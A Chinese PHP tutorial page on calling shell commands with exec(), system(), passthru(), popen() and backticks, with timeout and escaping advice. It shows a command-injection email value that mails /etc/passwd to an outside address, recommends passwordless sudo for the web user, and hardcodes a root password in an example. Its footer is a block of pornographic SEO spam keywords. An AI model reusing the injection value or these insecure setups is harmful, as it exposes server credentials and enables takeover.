站長資訊網
        最全最豐富的資訊網站

        教你玩轉PHP的exec()函數用法

        本篇文章給大家介紹一下如何玩轉PHP的exec()函數用法有一定的參考價值,有需要的朋友可以參考一下,希望對大家有所幫助。

        教你玩轉PHP的exec()函數用法

        PHP中提供了幾個調用linux命令的函數,exec、system、passthru,函數使用請參考手冊,這里不具體介紹。下面我以exec函數為例具體介紹:

        比如LINUX中修改服務器時間命令是 /bin/date -s '2010-05-28 13:10',我們通過php函數exec調用這個命令執行修改時間exec("sudo /bin/date -s '2010-05-28 13:10'",$out,$status);其中$out是輸出值,$status是返回值0或1,如果返回0則執行成功,返回1則執行失敗。要通過PHP成功執行這個命令(PHP運行用戶非root)需要檢查以下幾點:

        1、首先查看php運行用戶,可以在web服務器配置文件中查看,或者運行

        <?php echo shell_exec("id -a");?>

        直接查看。比如我的運行用戶是www,編輯/etc/sudoers文件

        vi /etc/sudoers

        這表示www用戶運行的時候不用輸入密碼。接著看圖片注釋掉前面兩個,刪除圈著的環境變量LS_COLORS,其中Ubuntu中是沒有這幾個的,這一步可省略,其他Redhat、Fedora、Centos這幾個都是需要這么做的。

        教你玩轉PHP的exec()函數用法 2、查看php.ini中配置是否打開安全模式,主要是以下三個地方

        safe_mode =  (這個如果為off下面兩個就不用管了)    disable_functions =     safe_mode_exec_dir=

        PHP 執行系統外部命令 system() exec() passthru()

        PHP作為一種服務器端的腳本語言,象編寫簡單,或者是復雜的動態網頁這樣的任務,它完全能夠勝任。但事情不總是如此,有時為了實現某個功能,必須借助于操作系統的外部程序(或者稱之為命令),這樣可以做到事半功倍。
        區別:

        system() 輸出并返回最后一行shell結果。

        exec() 不輸出結果,返回最后一行shell結果,所有結果可以保存到一個返回的數組里面。

        passthru() 只調用命令,把命令的運行結果原樣地直接輸出到標準輸出設備上。
        相同點:

        都可以獲得命令執行的狀態碼

        //system('dir'); // exec ('dir'); // passthru ('dir'); // echo `dir`;

        PHP作為一種服務器端的腳本語言,象編寫簡單,或者是復雜的動態網頁這樣的任務,它完全能夠勝任。但事情不總是如此,有時為了實現某個功能,必須借助于操作系統的外部程序(或者稱之為命令),這樣可以做到事半功倍。
        那么,是否可以在PHP腳本中調用外部命令呢?如果能,如何去做呢?有些什么方面的顧慮呢?相信你看了本文后,肯定能夠回答這些問題了。是否可以?
        答案是肯定的。PHP和其它的程序設計語言一樣,完全可以在程序內調用外部命令,并且是很簡單的:只要用一個或幾個函數即可。
        前提條件
        由于PHP基本是用于WEB程序開發的,所以安全性成了人們考慮的一個重要方面。于是PHP的設計者們給PHP加了一個門:安全模式。如果運行在安全模式下,那么PHP腳本中將受到如下四個方面的限制:
        執行外部命令
        在打開文件時有些限制
        連接MySQL數據庫
        基于HTTP的認證
        在 安全模式下,只有在特定目錄中的外部程序才可以被執行,對其它程序的調用將被拒絕。這個目錄可以在php.ini文件中用safe_mode_exec_dir指令,或在編譯PHP是加上--with-exec-dir選項來指定,默認是 /usr/local/php/bin。
        如果你調用一個應該可以輸出結果的外部命令(意思是PHP腳本沒有錯誤),得到的卻是一片空白,那么很可能你的網管已經把PHP運行在安全模式下了。
        如何做?
        在PHP中調用外部命令,可以用如下三種方法來實現:
        1) 用PHP提供的專門函數
        PHP提供共了3個專門的執行外部命令的函數:system(),exec(),passthru()。
        system()
        原型:string system (string command [, int return_var])
        system()函數很其它語言中的差不多,它執行給定的命令,輸出和返回結果。第二個參數是可選的,用來得到命令執行后的狀態碼。
        例子:

        <?php system("/usr/local/bin/webalizer/webalizer"); ?> exec()

        原型:string exec (string command [, string array [, int return_var]])
        exec ()函數與system()類似,也執行給定的命令,但不輸出結果,而是返回結果的最后一行。雖然它只返回命令結果的最后一行,但用第二個參數array 可以得到完整的結果,方法是把結果逐行追加到array的結尾處。所以如果array不是空的,在調用之前最好用unset()最它清掉。只有指定了第二 個參數時,才可以用第三個參數,用來取得命令執行的狀態碼。
        例子:

        <?php exec("/bin/ls -l"); exec("/bin/ls -l", $res); exec("/bin/ls -l", $res, $rc); ?> passthru()

        原型:void passthru (string command [, int return_var])
        passthru ()只調用命令,不返回任何結果,但把命令的運行結果原樣地直接輸出到標準輸出設備上。所以passthru()函數經常用來調用象pbmplus (Unix下的一個處理圖片的工具,輸出二進制的原始圖片的流)這樣的程序。同樣它也可以得到命令執行的狀態碼。
        例子:

        <?php header("Content-type: image/gif"); passthru("./ppmtogif hunte.ppm"); ?>

        2) 用popen()函數打開進程
        上面的方法只能簡單地執行命令,卻不能與命令交互。但有些時候必須向命令輸入一些東西,如在增加Linux的系統用戶時,要調用su來把當前用戶換到root才行,而su命令必須要在命令行上輸入root的密碼。這種情況下,用上面提到的方法顯然是不行的。
        popen ()函數打開一個進程管道來執行給定的命令,返回一個文件句柄。既然返回的是一個文件句柄,那么就可以對它讀和寫了。在PHP3中,對這種句柄只能做單一 的操作模式,要么寫,要么讀;從PHP4開始,可以同時讀和寫了。除非這個句柄是以一種模式(讀或寫)打開的,否則必須調用pclose()函數來關閉 它。
        例子1:

        <?php $fp=popen("/bin/ls -l", "r"); ?>

        例子2:

        <?php /* PHP中如何增加一個系統用戶 下面是一段例程,增加一個名字為james的用戶, root密碼是 verygood。僅供參考 */ $sucommand = "su --login root --command"; $useradd = "useradd "; $rootpasswd = "verygood"; $user = "james"; $user_add = sprintf("%s "%s %s"",$sucommand,$useradd,$user); $fp = @popen($user_add,"w"); @fputs($fp,$rootpasswd); @pclose($fp); ?>

        3) 用反撇號(`,也就是鍵盤上ESC鍵下面的那個,和~在同一個上面)
        這個方法以前沒有歸入PHP的文檔,是作為一個秘技存在的。方法很簡單,用兩個反撇號把要執行的命令括起來作為一個表達式,這個表達式的值就是命令執行的結果。如:

        <?php $res='/bin/ls -l'; echo ' '.$res.' '; ?>

        這個腳本的輸出就象:
        hunte.gif
        hunte.ppm
        jpg.htm
        jpg.jpg
        passthru.php
        要考慮些什么?
        要考慮兩個問題:安全性和超時。
        先看安全性。比如,你有一家小型的網上商店,所以可以出售的產品列表放在一個文件中。你編寫了一個有表單的HTML文件,讓你的用戶輸入他們的EMAIL地 址,然后把這個產品列表發給他們。假設你沒有使用PHP的mail()函數(或者從未聽說過),你就調用Linux/Unix系統的mail程序來發送這 個文件。程序就象這樣:

        <?php system("mail $to < products.txt"); echo "我們的產品目錄已經發送到你的信箱:$to"; ?>

        用這段代碼,一般的用戶不會產生什么危險,但實際上存在著非常大的安全漏洞。如果有個惡意的用戶輸入了這樣一個EMAIL地址:
        '–bla ; mail someone@domain.com < /etc/passwd ;'
        那么這條命令最終變成:
        'mail –bla ; mail someone@domain.com < /etc/passwd ; < products.txt'
        我相信,無論哪個網絡管理人員見到這樣的命令,都會嚇出一身冷汗來。
        幸好,PHP為我們提供了兩個函數:EscapeShellCmd()和EscapeShellArg()。函數EscapeShellCmd把一個字符串 中所有可能瞞過Shell而去執行另外一個命令的字符轉義。這些字符在Shell中是有特殊含義的,象分號(),重定向(>)和從文件讀入 (<)等。函數EscapeShellArg是用來處理命令的參數的。它在給定的字符串兩邊加上單引號,并把字符串中的單引號轉義,這樣這個字符串 就可以安全地作為命令的參數。
        再來看看超時問題。如果要執行的命令要花費很長的時間,那么應該把這個命令放到系統的后臺去運 行。但在默認情況下,象system()等函數要等到這個命令運行完才返回(實際上是要等命令的輸出結果),這肯定會引起PHP腳本的超時。解決的辦法是 把命令的輸出重定向到另外一個文件或流中,如:

        <?php system("/usr/local/bin/order_proc > /tmp/null &"); ?>

        推薦學習:php視頻教程

        贊(0)
        分享到: 更多 (0)
        網站地圖   滬ICP備18035694號-2    滬公網安備31011702889846號
        主站蜘蛛池模板: 香蕉依依精品视频在线播放| 无码人妻精品一区二区三区东京热 | 亚洲日韩欧美制服精品二区| 91国内揄拍国内精品情侣对白 | 午夜在线视频91精品| 国产精品青草久久久久福利99| 国产精品电影在线观看| 国产精品无码成人午夜电影| 亚洲∧v久久久无码精品 | 日本一区二区三区精品国产| 国产精品亚洲mnbav网站| 欧美高清在线精品一区| 国产69精品久久久久777| 国产精品熟女高潮视频| 亚洲欧美激情精品一区二区| 亚洲第一区精品日韩在线播放| 国内精品伊人久久久久网站| 国产成人无码精品久久久免费| 麻豆精品久久久一区二区| 久久99精品综合国产首页| 国产精品久久国产精麻豆99网站| 99久久99久久久精品齐齐| 999在线视频精品免费播放观看 | 国产啪亚洲国产精品无码| 国产成人无码精品一区在线观看| 国产VA免费精品高清在线| 91久久精品国产成人久久| 欧美日韩精品乱国产538| 免费精品一区二区三区第35 | 精品国产一区二区三区在线观看| 精品久久人妻av中文字幕| 亚洲处破女AV日韩精品| 亚洲热线99精品视频| 亚洲精品无码永久在线观看你懂的| 亚洲人午夜射精精品日韩| 亚洲乱码国产乱码精品精| 亚洲国产精品成人精品无码区在线| 亚洲国产精品嫩草影院在线观看| 无码精品国产VA在线观看DVD| 人人妻人人澡人人爽欧美精品 | 国产精品嫩草影院一二三区|